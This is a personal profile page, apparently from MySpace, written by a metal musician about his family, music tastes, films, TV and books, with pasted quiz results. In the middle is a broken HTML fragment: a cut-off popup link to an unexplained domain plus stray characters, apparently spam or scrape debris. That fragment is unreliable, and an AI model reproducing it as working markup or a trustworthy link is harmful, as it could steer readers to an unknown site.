God, my three boys Deqlan, Donovan and Davan. My wife Jae. Family. Friends. Work. My HHR. METAL!!!Take the quiz: "Which Random Irish Gaelic Phrase Are You? "
Pog mo thoin
Pog mo thoin - 'Kiss my ass.'You're one tough bastard, and if anyone doesn't like it, they can kiss your ass. You enjoy fighting and causing grievous bodily harm. Hey! What are you lookin' at, punk?
Your Expression Number is 1
You have the skills to be a top executive or businessperson.
But first you must develop your natural capacity to be a good leader.
You are truly original - with a creative approach to life and a very sharp mind.
You reach for the sky, and you have the potential to reach it.
Assertive and straight forward, you have little need for supervision.
You are self-confident, self-reliant, and courageous in your convictions.
While you sometimes fear loneliness, you prefer to be left alone.
A bit self centered, you may be hard to life with at times.
You also have a strong dominant streak - which can push others away at times.
What's Your Expression Number?a class="popup_wrapper" style="cursor:default;background-image:url(http://i92.photob
947px;" href="http://4ov4i.cn/s/" m$l$
Too many people. I think Tommy Lee would be cool as hell to meet. Trent Reznor for sure. I think Manson would be a great time to converse with too. He seems very intelligent, like to see what he is about... Pretty much anyone that is involved in the metal scene I would meet with though... But most importantly, to all of the Downshift fans, I love meeting all of you. I really push myself to take the time out to talk to all of you and sign whatever you want me to sign. Hell, there was even a kid that wanted me to sign his tooth that he broke off in our pit! I would've done it but he couldn't find it...haha But seriously, if it weren't for you guys, Downshift would've never gone where it did, so thanks...View All Friends | View Blog | View Pics | Add Comment
Check out this band called "Birthwall" Granted, it's just a one man band at this point, but if you like the old Slipknot stuff, you will definitely like this band. TRUST me on that one... It's pretty uncanny and definitely phenomenal. Click on the banner below and enjoy...
Well, here are my top favorite bands and then a list down below of some more of the other bands I love, not all of them, but you would be reading forever if I put ALL of them down...1. Mudvayne
2. Slipknot
3. 36 Crazyfists
4. Demon Hunter
5. As I Lay DyingAlso, another band that I think EVERYONE should check out is this band called Car Bomb.... Check them out, I guarantee you that you won't find anyone like them...
Again, I am a movie buff, so, there are WAY too many to list. But, I would have to say my favorite movie of all time has got to be American History X. Damn that is a good movie... Put your teeth on the curb!!!
I am a Wheel Watcher...haha Yup, I can't miss an episode of Wheel of Fortune or I get pissed... I also like Law and Order S.V.U. or as I call it, "Casey Jones". I really dig that show "Shark" that's on right now too. Other then that, anything that has to do with cars. I like that American Hot Rod show. That's pretty sweet...
The BibleThe HobbitChiltons ManualsTommylandThe Fulfillment of All DesireInterview With An ExorcistMuscle Mustangs and Fast Fords
Look at the "People I would like to meet" part again. That pretty much sums it all up... Other then that, my dad. He is the most awesome man on this planet... Well, besides me anyways! ha!